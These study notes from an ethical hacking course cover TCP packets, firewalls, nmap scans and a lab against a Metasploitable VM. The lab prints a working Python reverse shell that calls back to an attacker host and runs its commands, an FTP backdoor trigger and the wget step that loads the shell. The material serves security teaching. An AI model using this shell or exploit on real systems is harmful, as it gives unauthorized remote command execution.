Ethical.Hacking.2021.10:CRAFTING TCP SHELLS AND BOTNETS(1)

This post explains how a file is transmitted over TCP as multiple packets, including the use of sequence numbers to ensure correct reassembly. It discusses how firewalls and NAT block connections initiated from outside while allowing connections initiated from inside, introduces the concept of a reverse shell and how it is used, and shows how vulnerable services are found by scanning and then exploited. It also presents Python code for a reverse shell client and server.

How a file is converted into packets with sequence numbers

Before a file can be transmitted, it must be encapsulated into a packet. However, TCP packets have a maximum size of 64KB, so files larger than this are divided and placed into several TCP packets.

Each packet is assigned a sequence number so that the file can be reassembled.
Sequence numbers are consecutive, which allows the recipient to determine the proper order in which to interpret the packets.

However, each machine starts the sequence with a random number to keep hackers from predicting the sequence.
Before two machines can transmit their packets, they must both receive and acknowledge the other machine's starting sequence number so that they can keep track of any lost packets. This
exchange is called the TCP three-way handshake.

When the systems have finished exchanging packets, they close the connection by exchanging FIN and ACK packets.
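As an added illustration (not from the original post or the book) of the segmentation and sequence numbering just described, this constructed Python example splits a small message into segments numbered from a random initial sequence number (ISN), reassembles them after the network has reordered them, and reports the first gap when a segment is lost. It does not model 32-bit sequence wraparound, so the ISN is kept to 31 bits.

```python
import random

MSS = 4  # constructed: a tiny maximum segment size so the example stays readable


def segment(data: bytes, mss: int, isn: int):
    """Split data into (seq, payload) segments.

    TCP sequence numbers count bytes, so each segment's number is the ISN plus
    the offset of its first byte in the stream.
    """
    segments = []
    seq = isn
    for i in range(0, len(data), mss):
        chunk = data[i:i + mss]
        segments.append((seq, chunk))
        seq += len(chunk)
    return segments


def reassemble(segments, isn: int):
    """Order segments by sequence number and rebuild the stream.

    Returns (data, None) when everything arrived, or (prefix, missing_seq) when a
    gap was found: missing_seq is the number the receiver would keep ACKing until
    the lost segment is retransmitted.
    """
    out = bytearray()
    expected = isn
    for seq, payload in sorted(segments, key=lambda s: s[0]):
        if seq != expected:
            return bytes(out), expected
        out += payload
        expected = seq + len(payload)
    return bytes(out), None


def run_demo(seed: int = 1):
    """Constructed end-to-end run: random ISN, reordering, then one lost segment."""
    rng = random.Random(seed)
    isn = rng.getrandbits(31)  # random starting number, as the text describes
    data = b"Bot reporting for duty"
    segs = segment(data, MSS, isn)
    rng.shuffle(segs)  # the network may deliver out of order
    reordered = reassemble(segs, isn)
    lost = [s for s in segs if s[0] != isn + 8]  # drop the third segment
    damaged = reassemble(lost, isn)
    return reordered, damaged, isn
```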

Firewalls prevent machines outside the network from initiating connections to servers
inside the network.

However, many firewalls allow the reverse: machines inside the network can still initiate connections to machines outside the network.

How firewalls and NAT block incoming connection, but not outgoing ones


A reverse shell consists of two parts: a component that connects
to the attacker’s computer, and a shell component that allows an
attacker to execute terminal commands on the victim’s machine.

The IANA registry maps port numbers to their associated services: https://www.iana.org/assignments/service-names-port-numbers/service-names-port-numbers.xhtml

Scanning for Open Ports

nmap -sV 192.168.1.101

nmap performs a SYN scan by default. Instead of establishing a full connection, a SYN scan sends TCP SYN packets, listens for SYN-ACK responses, and marks a port as open if it receives a response.

The -sS flag selects the SYN scan:

nmap -sS <Metasploitable IP address>

A FIN scan uses TCP FIN packets to bypass firewall protections:

nmap -sF <Metasploitable IP address>

An Xmas scan sets the FIN, PSH, and URG flags
in the TCP packet. The PSH and URG flags are rarely used, and
systems often contain incomplete or incorrect implementations of the
TCP/IP standard that don't handle them uniformly. By examining how
a system responds to these flags, an attacker can infer information
about the TCP/IP implementation and learn about the system.

nmap -sX <Metasploitable IP address>
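Added example, not from the book or the post: seen from the defender's side, the scans above are distinguished by the flag byte of each TCP header. This Python code packs and parses raw 20-byte TCP headers, labels each probe by its flag combination (SYN, FIN, Xmas = FIN+PSH+URG, NULL), and tallies probes per destination port over a constructed capture, which is roughly how an IDS summarises a scan.

```python
import struct

# TCP flag bits in byte 13 of the header (CWR/ECE, 0x80/0x40, are masked off below)
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20
TCP_HDR = "!HHIIBBHHH"  # sport, dport, seq, ack, data offset, flags, window, checksum, urgent


def build_tcp_header(sport, dport, flags, seq=0, ack=0):
    """Constructed 20-byte TCP header with no options and a zero checksum."""
    data_offset = 5 << 4  # five 32-bit words, upper nibble of byte 12
    return struct.pack(TCP_HDR, sport, dport, seq, ack, data_offset, flags, 1024, 0, 0)


def parse_tcp_header(raw):
    """Return the fields a scan detector cares about from a raw TCP header."""
    if len(raw) < 20:
        raise ValueError("truncated TCP header")
    sport, dport, seq, ack, _off, flags, _win, _csum, _urg = struct.unpack(TCP_HDR, raw[:20])
    return {"sport": sport, "dport": dport, "seq": seq, "ack": ack, "flags": flags}


def classify_probe(flags):
    """Name the nmap probe type that would carry this flag combination."""
    mask = flags & (FIN | SYN | RST | PSH | ACK | URG)
    if mask == 0:
        return "null"                 # -sN: no flags at all
    if mask == FIN:
        return "fin"                  # -sF
    if mask == FIN | PSH | URG:
        return "xmas"                 # -sX
    if mask == SYN:
        return "syn"                  # -sS, or simply a normal connection attempt
    if mask == SYN | ACK:
        return "syn-ack"              # the reply that marks a port as open
    return "other"


def summarize(capture):
    """Count (destination port, probe type) pairs over a list of raw headers."""
    counts = {}
    for raw in capture:
        h = parse_tcp_header(raw)
        key = (h["dport"], classify_probe(h["flags"]))
        counts[key] = counts.get(key, 0) + 1
    return counts


# Constructed capture: an Xmas scan of ports 21-23 plus one ordinary SYN to port 80
SAMPLE = [build_tcp_header(40000 + i, p, FIN | PSH | URG) for i, p in enumerate((21, 22, 23))]
SAMPLE.append(build_tcp_header(40003, 80, SYN))
```

A single FIN or Xmas probe is suspicious on its own because no legitimate client opens a connection that way; SYN probes only stand out by their volume across ports.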


Exploiting a Vulnerable Service

Known vulnerabilities are catalogued in the National Vulnerability Database at https://nvd.nist.gov/.

When no known vulnerability applies, an attacker will need to discover an unknown one. These are called zero-day vulnerabilities because the victim is unaware of them and so has zero days to fix them.


python -m http.server 8000

# Note: under Python 2 the equivalent is
python -m SimpleHTTPServer 8000

Writing a Reverse Shell Client

reverseShell.py

import sys
from subprocess import Popen, PIPE
from socket import *

serverName = sys.argv[1]   # ➊ attacker's address, given on the command line
serverPort = 8000
# Create an IPv4 (AF_INET), TCP (SOCK_STREAM) socket
clientSocket = socket(AF_INET, SOCK_STREAM)   # ➋
clientSocket.connect((serverName, serverPort))   # ➌ connect out to the attacker
clientSocket.send('Bot reporting for duty'.encode())   # ➍
command = clientSocket.recv(4064).decode()   # ➎ wait for the first command
while command != "exit":
    proc = Popen(command.split(" "), stdout=PIPE, stderr=PIPE)   # ➏ run it in a subprocess
    result, err = proc.communicate()   # ➐ collect its output
    clientSocket.send(result)
    command = clientSocket.recv(4064).decode()
clientSocket.close()

The Popen method ➏ creates a copy, or fork, of the current process, called a subprocess, and runs the command in it.

Writing a TCP Server That Listens for Client Connections

shellServer.py

from socket import *

serverPort = 8000
serverSocket = socket(AF_INET, SOCK_STREAM)   # ➊
serverSocket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)   # ➋ allow a quick restart on the same port
serverSocket.bind(('', serverPort))   # ➌ listen on all interfaces
serverSocket.listen(1)   # ➍
print("Attacker box listening and awaiting instructions")
connectionSocket, addr = serverSocket.accept()   # ➎ block until the client connects
print("Thanks for connecting to me " + str(addr))
message = connectionSocket.recv(1024)
print(message)
command = ""
while command != "exit":
    command = input("Please enter a command: ")
    connectionSocket.send(command.encode())
    message = connectionSocket.recv(1024).decode()
    print(message)
connectionSocket.shutdown(SHUT_RDWR)   # ➏
connectionSocket.close()

Start the server:

python3 ~/Desktop/shell/shellServer.py

Loading the Reverse Shell onto the Metasploitable Server

 python3 -m http.server 8080

nc <Metasploitable IP address> 21
user Hacker:)
pass invalid

nc <Metasploitable IP address> 6200

mkdir shell
cd shell
wget <Kali IP>:8080/reverseShell.py

Start the reverse shell on the Metasploitable machine

python reverseShell.py <Kali IP address> &

Switch over to the Kali Linux machine and try executing a command:
